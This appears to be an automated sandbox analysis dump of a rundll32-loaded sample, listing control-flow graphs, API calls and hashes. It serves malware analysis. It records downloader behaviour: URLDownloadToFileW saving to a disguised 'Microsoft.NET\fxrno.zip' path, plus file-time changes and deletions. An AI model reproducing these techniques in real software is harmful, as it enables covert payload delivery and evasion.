                                                                              control_flow_graph 134 4640844-46408de call 4640cf4 call 4640d04 call 4640d14 call 4640d24 * 3 147 46408e0-4640903 RaiseException 134->147 148 4640908-4640915 134->148 149 4640b18-4640b1e 147->149 150 4640917 148->150 151 464091a-464093a 148->151 150->151 152 464093c-464094b call 4640d34 151->152 153 464094d-4640955 151->153 155 4640958-4640961 152->155 153->155 157 4640963-4640973 155->157 158 464097a-464097c 155->158 157->158 170 4640975 157->170 159 4640982-4640989 158->159 160 4640a3e-4640a48 158->160 164 4640999-464099b 159->164 165 464098b-4640997 159->165 161 4640a58-4640a5a 160->161 162 4640a4a-4640a56 160->162 168 4640aa7-4640aa9 161->168 169 4640a5c-4640a60 161->169 162->161 166 464099d-46409a6 LoadLibraryA 164->166 167 46409a8-46409aa 164->167 165->164 166->167 172 46409f7-4640a03 call 4640138 167->172 173 46409ac-46409bb GetLastError 167->173 178 4640af1-4640af4 168->178 179 4640aab-4640aba GetLastError 168->179 175 4640a62-4640a66 169->175 176 4640a9b-4640aa5 GetProcAddress 169->176 177 4640af6-4640afd 170->177 195 4640a05-4640a09 172->195 196 4640a38-4640a39 FreeLibrary 172->196 182 46409bd-46409c9 173->182 183 46409cb-46409cd 173->183 175->176 186 4640a68-4640a73 175->186 176->168 184 4640b16 177->184 185 4640aff-4640b0e 177->185 178->177 180 4640abc-4640ac8 179->180 181 4640aca-4640acc 179->181 180->181 181->178 188 4640ace-4640aee RaiseException 181->188 182->183 183->172 189 46409cf-46409f2 RaiseException 183->189 184->149 185->184 186->176 190 4640a75-4640a7b 186->190 188->178 189->149 190->176 194 4640a7d-4640a8a 190->194 194->176 197 4640a8c-4640a97 194->197 195->160 198 4640a0b-4640a19 LocalAlloc 195->198 196->160 197->176 199 4640a99 197->199 198->160 200 4640a1b-4640a36 198->200 199->178 200->160
                                                                              APIs
                                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 046408FC
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3997070919-0
                                                                              • Opcode ID: 6e140243add38b2312ba84ef068bbfcf1107ef740e330be0578c178ed81885e8
                                                                              • Instruction ID: cc88f255b3154da4e9d853b7777f347c05334d2aae683bcf76c65971273a75ac
                                                                              • Opcode Fuzzy Hash: 6e140243add38b2312ba84ef068bbfcf1107ef740e330be0578c178ed81885e8
                                                                              • Instruction Fuzzy Hash: 1FA16E75A01219DFEF14DFE8C880BAEB7F5EB88310F144529EA05A7380EB74B985CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 201 4654d9c-4654db5 call 463a8a4 GetFileAttributesW 204 4654db7-4654dba 201->204 205 4654e06-4654e10 GetLastError 201->205 208 4654dbc-4654dbe 204->208 209 4654dff-4654e04 204->209 206 4654e27-4654e29 205->206 207 4654e12-4654e15 205->207 210 4654e2d-4654e30 206->210 207->206 211 4654e17-4654e1a 207->211 212 4654dc4-4654dc6 208->212 213 4654dc0-4654dc2 208->213 209->210 211->206 214 4654e1c-4654e25 call 4654d5c 211->214 215 4654dcc-4654de4 CreateFileW 212->215 216 4654dc8-4654dca 212->216 213->210 214->206 221 4654e2b 214->221 218 4654de6-4654dee CloseHandle 215->218 219 4654df0-4654dfd GetLastError 215->219 216->210 218->210 219->210 221->210
                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(00000000,?,?,?,0483BB1B), ref: 04654DAD
                                                                              • GetLastError.KERNEL32(00000000,?,?,?,0483BB1B), ref: 04654E06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesErrorFileLast
                                                                              • String ID: ${
                                                                              • API String ID: 1799206407-4046706400
                                                                              • Opcode ID: e8b005f719849b12b2ca676ba6db869ab08f7b7c44e98e6f74814e3b4c970313
                                                                              • Instruction ID: c9d1aa449e2aec5125a540049085b9dc29f7e91c99f75c6c87c2cf30c8ef3e2c
                                                                              • Opcode Fuzzy Hash: e8b005f719849b12b2ca676ba6db869ab08f7b7c44e98e6f74814e3b4c970313
                                                                              • Instruction Fuzzy Hash: 26018F6130920275EF3524781E86BBD01444FA66A9F280B96EE51AA2F0FE4574C36129
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 222 4635cec-4635cfb 223 4635d01-4635d05 222->223 224 4635de4-4635de7 222->224 225 4635d07-4635d0e 223->225 226 4635d68-4635d71 223->226 227 4635ed4-4635ed8 224->227 228 4635ded-4635df7 224->228 229 4635d10-4635d1b 225->229 230 4635d3c-4635d3e 225->230 226->225 235 4635d73-4635d7c 226->235 233 4635778-463579d call 46356c8 227->233 234 4635ede-4635ee3 227->234 231 4635df9-4635e05 228->231 232 4635da8-4635db5 228->232 237 4635d24-4635d39 229->237 238 4635d1d-4635d22 229->238 241 4635d53 230->241 242 4635d40-4635d51 230->242 239 4635e07-4635e0a 231->239 240 4635e3c-4635e4a 231->240 232->231 244 4635db7-4635dc0 232->244 252 46357b9-46357c0 233->252 253 463579f-46357ae VirtualFree 233->253 235->226 243 4635d7e-4635d92 Sleep 235->243 246 4635e0e-4635e12 239->246 240->246 248 4635e4c-4635e51 call 4635540 240->248 247 4635d56-4635d63 241->247 242->241 242->247 243->225 249 4635d98-4635da3 Sleep 243->249 244->232 250 4635dc2-4635dd6 Sleep 244->250 254 4635e54-4635e61 246->254 255 4635e14-4635e1a 246->255 247->228 248->246 249->226 250->231 251 4635dd8-4635ddf Sleep 250->251 251->232 261 46357c2-46357de VirtualQuery VirtualFree 252->261 257 46357b0-46357b2 253->257 258 46357b4-46357b7 253->258 254->255 263 4635e63-4635e6a call 4635540 254->263 259 4635e6c-4635e76 255->259 260 4635e1c-4635e3a call 4635580 255->260 267 46357f3-46357f5 257->267 258->267 265 4635ea4-4635ed1 call 46355e0 259->265 266 4635e78-4635ea0 VirtualFree 259->266 269 46357e0-46357e3 261->269 270 46357e5-46357eb 261->270 263->255 275 46357f7-4635807 267->275 276 463580a-463581a 267->276 269->267 270->267 274 46357ed-46357f1 270->274 274->261 275->276
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,0463595E), ref: 04635D82
                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0463595E), ref: 04635D9C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 9f59f84f305f61dcf176302a8ef4664e2572209ecf63ca23fdf7b4f95993f2c1
                                                                              • Instruction ID: 1269a204ee063defb07614cc7c8b8d2d732f3f7e3dc71bb58605c4f4c1b0ca2f
                                                                              • Opcode Fuzzy Hash: 9f59f84f305f61dcf176302a8ef4664e2572209ecf63ca23fdf7b4f95993f2c1
                                                                              • Instruction Fuzzy Hash: 96710731604380AFE715CF28D988B16BBE4EF95316F18866ED4468B392F774F841CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 278 4817d04-4817d1f PeekMessageW 279 4817d25-4817d29 278->279 280 4817e0d-4817e14 278->280 281 4817d39 279->281 282 4817d2b-4817d33 IsWindowUnicode 279->282 284 4817d3b-4817d44 281->284 282->281 283 4817d35-4817d37 282->283 283->284 285 4817d46-4817d5a PeekMessageW 284->285 286 4817d5c-4817d6f PeekMessageA 284->286 287 4817d70-4817d72 285->287 286->287 287->280 288 4817d78-4817d7e 287->288 289 4817d84-4817d90 288->289 290 4817e06 288->290 291 4817da2-4817dad call 4819ba0 289->291 292 4817d92-4817d96 289->292 290->280 291->280 295 4817daf-4817dba call 4817b98 291->295 292->291 295->280 298 4817dbc-4817dc0 295->298 298->280 299 4817dc2-4817dcd call 4817a50 298->299 299->280 302 4817dcf-4817dda call 4817aa0 299->302 302->280 305 4817ddc-4817de7 call 4817a08 302->305 305->280 308 4817de9-4817df4 TranslateMessage 305->308 309 4817df6-4817dfc DispatchMessageW 308->309 310 4817dfe-4817e04 DispatchMessageA 308->310 309->280 310->280
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04817D18
                                                                              • IsWindowUnicode.USER32 ref: 04817D2C
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04817D4F
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04817D65
                                                                              • TranslateMessage.USER32 ref: 04817DEA
                                                                              • DispatchMessageW.USER32 ref: 04817DF7
                                                                              • DispatchMessageA.USER32 ref: 04817DFF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                              • String ID:
                                                                              • API String ID: 2190272339-0
                                                                              • Opcode ID: 54e89615bd68571bf928fcffb351ea495805929435bda1f4a430a71865399576
                                                                              • Instruction ID: 2dccaf20415ea8fa8eb4480d8eaf4563231da77e5c001c5d0005068ea8ae9716
                                                                              • Opcode Fuzzy Hash: 54e89615bd68571bf928fcffb351ea495805929435bda1f4a430a71865399576
                                                                              • Instruction Fuzzy Hash: 5421942174434476FB226A280C80B7E96DD4FC2F08F144E1FE692D71A1E6A6B8864796
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0484ADB9
                                                                                • Part of subcall function 04654E34: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0484AD72,00000000,0484ADE0), ref: 04654E4A
                                                                                • Part of subcall function 04655804: CreateDirectoryW.KERNEL32(00000000,00000000,?,0484AD80,00000000,0484ADE0), ref: 04655811
                                                                                • Part of subcall function 0484AC78: Sleep.KERNEL32(0000012C,00000000,0484AD29), ref: 0484ACB2
                                                                                • Part of subcall function 0484AC78: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0484ACCF
                                                                                • Part of subcall function 0484AC78: Sleep.KERNEL32(0000012C,0000012C,00000000,0484AD29), ref: 0484AD09
                                                                              Strings
                                                                              • C:\Program Files (x86)\Microsoft.NET\0, xrefs: 0484AD68, 0484AD76
                                                                              • C:\Program Files (x86)\Microsoft.NET\fxrno.zip, xrefs: 0484AD9A
                                                                              • 0D4B54E2510D779321C394431AAB62EC1A00CF5127ACD3831796E365999688CED043E97C733BBBB37C38BB23453C04D002A3186949B40A7C, xrefs: 0484AD8A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileSleep$AttributesCreateDirectoryDownloadMessage
                                                                              • String ID: 0D4B54E2510D779321C394431AAB62EC1A00CF5127ACD3831796E365999688CED043E97C733BBBB37C38BB23453C04D002A3186949B40A7C$C:\Program Files (x86)\Microsoft.NET\0$C:\Program Files (x86)\Microsoft.NET\fxrno.zip
                                                                              • API String ID: 1982375319-4057267018
                                                                              • Opcode ID: 501ccbc4238ca96931e94089bfa8fc4a03c408f5150961b08e66914bab8c0dc1
                                                                              • Instruction ID: 242d465ab1be7ea27b70fbb1f4832c30cfe84b08b74e38a0f7e45c72eabbf1bd
                                                                              • Opcode Fuzzy Hash: 501ccbc4238ca96931e94089bfa8fc4a03c408f5150961b08e66914bab8c0dc1
                                                                              • Instruction Fuzzy Hash: 3311867068060C9FFB14EB64CC41BDE73E4DBC8609F500965E901FF750EA75BD448A69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 331 4654e34-4654e54 call 463a8a4 GetFileAttributesW 334 4654edb-4654ee3 GetLastError 331->334 335 4654e5a-4654e60 331->335 336 4654f05-4654f07 334->336 337 4654ee5-4654ee8 334->337 338 4654e70-4654e74 335->338 339 4654e62-4654e6b 335->339 341 4654f0b-4654f12 336->341 337->336 340 4654eea-4654eef 337->340 342 4654ea4-4654eaa 338->342 343 4654e76-4654e91 CreateFileW 338->343 339->341 340->336 346 4654ef1-4654ef4 340->346 344 4654eb0-4654ecb CreateFileW 342->344 345 4654eac-4654eae 342->345 343->341 347 4654e93-4654ea2 CloseHandle 343->347 348 4654ed7-4654ed9 344->348 349 4654ecd-4654ed5 CloseHandle 344->349 345->341 346->336 350 4654ef6-4654ef9 346->350 347->341 348->341 349->341 350->336 351 4654efb-4654efe 350->351 351->336 352 4654f00-4654f03 351->352 352->336 353 4654f09 352->353 353->341
                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0484AD72,00000000,0484ADE0), ref: 04654E4A
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0484AD72,00000000,0484ADE0), ref: 04654E89
                                                                              • CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0484AD72,00000000), ref: 04654E94
                                                                              • GetLastError.KERNEL32(00000000,?,?,?,?,?,0484AD72,00000000,0484ADE0), ref: 04654EDB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCloseCreateErrorHandleLast
                                                                              • String ID:
                                                                              • API String ID: 2927643983-0
                                                                              • Opcode ID: f6f3a705867429bf134debe3fe08f2cb9bc70fdbabb28322cc5906c8e5be3005
                                                                              • Instruction ID: 9e8f5a23af8a705ae82d73bcc29101149b406f389cd1fa608e69d16ddab85da9
                                                                              • Opcode Fuzzy Hash: f6f3a705867429bf134debe3fe08f2cb9bc70fdbabb28322cc5906c8e5be3005
                                                                              • Instruction Fuzzy Hash: 3211EB3174525469FB3410AC5CC9BBA11448FE2764F2A06A9FE5BF63F0FC94B4C15055
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 354 4635968-463597a 355 4635980-4635990 354->355 356 4635bc8-4635bcd 354->356 359 4635992-463599f 355->359 360 46359e8-46359f1 355->360 357 4635bd3-4635be4 356->357 358 4635ce0-4635ce3 356->358 362 4635be6-4635c02 357->362 363 4635b8c-4635b99 357->363 364 4635714-463573d VirtualAlloc 358->364 365 4635ce9-4635ceb 358->365 366 46359a1-46359ae 359->366 367 46359b8-46359c4 359->367 360->359 361 46359f3-46359ff 360->361 361->359 368 4635a01-4635a0d 361->368 369 4635c10-4635c1f 362->369 370 4635c04-4635c0c 362->370 363->362 375 4635b9b-4635ba4 363->375 371 463576f-4635775 364->371 372 463573f-463576c call 46356c8 364->372 373 46359b0-46359b4 366->373 374 46359d8-46359e5 366->374 376 46359c6-46359d4 367->376 377 4635a3c-4635a45 367->377 368->359 378 4635a0f-4635a1b 368->378 381 4635c21-4635c35 369->381 382 4635c38-4635c40 369->382 379 4635c6c-4635c82 370->379 372->371 375->363 385 4635ba6-4635bba Sleep 375->385 383 4635a80-4635a8a 377->383 384 4635a47-4635a54 377->384 378->360 387 4635a1d-4635a2d Sleep 378->387 394 4635c84-4635c92 379->394 395 4635c9b-4635ca7 379->395 381->379 389 4635c42-4635c5a 382->389 390 4635c5c-4635c5e call 463564c 382->390 392 4635afc-4635b08 383->392 393 4635a8c-4635ab7 383->393 384->383 391 4635a56-4635a5f 384->391 385->362 386 4635bbc-4635bc3 Sleep 385->386 386->363 387->359 400 4635a33-4635a3a Sleep 387->400 401 4635c63-4635c6b 389->401 390->401 391->384 402 4635a61-4635a75 Sleep 391->402 398 4635b30-4635b3f call 463564c 392->398 399 4635b0a-4635b1c 392->399 404 4635ad0-4635ade 393->404 405 4635ab9-4635ac7 393->405 394->395 406 4635c94 394->406 396 4635ca9-4635cbc 395->396 397 4635cc8 395->397 409 4635cbe-4635cc3 call 4635580 396->409 410 4635ccd-4635cdf 396->410 397->410 418 4635b51-4635b8a 398->418 422 4635b41-4635b4b 398->422 411 4635b20-4635b2e 399->411 412 4635b1e 399->412 400->360 402->383 414 4635a77-4635a7e Sleep 402->414 407 4635ae0-4635afa call 4635580 404->407 408 4635b4c 404->408 405->404 415 4635ac9 405->415 406->395 407->418 408->418 409->410 411->418 412->411 414->384 415->404
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 04635A1F
                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 04635A35
                                                                              • Sleep.KERNEL32(00000000), ref: 04635A63
                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 04635A79
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: a3edf728a77fc690d45e072efaa2a5fe527defca628655251ff0507827c57dee
                                                                              • Instruction ID: 7da6648c0e971f7d7c9de9dde4ae48710abdb6ad079c317b5e3c6db7081c5440
                                                                              • Opcode Fuzzy Hash: a3edf728a77fc690d45e072efaa2a5fe527defca628655251ff0507827c57dee
                                                                              • Instruction Fuzzy Hash: 50C147B2601391DFD715CF68E488715BBE0FB85316F0886AED4568B386E3B4F881CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • SetLastError.KERNEL32(00000000,00000000,0472B075,?,00000000,0472B0D7), ref: 0472B011
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000080,00000000,00000000,00000000,0472B075,?,00000000,0472B0D7), ref: 0472B048
                                                                              • SetFileTime.KERNEL32(000000FF,00000000,?,?,00000000,40000000,00000002,00000000,00000003,00000080,00000000,00000000,00000000,0472B075,?,00000000), ref: 0472B066
                                                                              • CloseHandle.KERNEL32(000000FF,0472B0DE,00000000,00000000,00000000,0472B075,?,00000000,0472B0D7), ref: 0472B0B2
                                                                              • SetLastError.KERNEL32(00000000,000000FF,0472B0DE,00000000,00000000,00000000,0472B075,?,00000000,0472B0D7), ref: 0472B0B9
                                                                                • Part of subcall function 0472A678: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,0472B0D7,?,?,?), ref: 0472A6BE
                                                                                • Part of subcall function 0472A678: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,0472B0D7,?,?,?), ref: 0472A6D3
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileTime$ErrorLast$CloseCreateHandleLocalSystem
                                                                              • String ID:
                                                                              • API String ID: 4140168353-0
                                                                              • Opcode ID: 89dcb7ee55ba58b64c29e29b322f32d1d8297862d648ce38fa131387cc4bfe81
                                                                              • Instruction ID: 9b568619b7a74018b29a95bfdb972cf87deeb537401a96d87c9d58691ed3aad9
                                                                              • Opcode Fuzzy Hash: 89dcb7ee55ba58b64c29e29b322f32d1d8297862d648ce38fa131387cc4bfe81
                                                                              • Instruction Fuzzy Hash: 2E415DB4A00219AFEB11DFA8C940BAEBBF5FF89704F118565E514EB360E735AD01CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 467 4655394-46553b1 call 463a8a4 DeleteFileW 470 46553b3-46553c3 GetLastError GetFileAttributesW 467->470 471 46553e9-46553ef 467->471 472 46553c5-46553c8 470->472 473 46553e3-46553e4 SetLastError 470->473 472->473 474 46553ca-46553cc 472->474 473->471 474->473 475 46553ce-46553e1 call 463a8a4 RemoveDirectoryW 474->475 475->471
                                                                              APIs
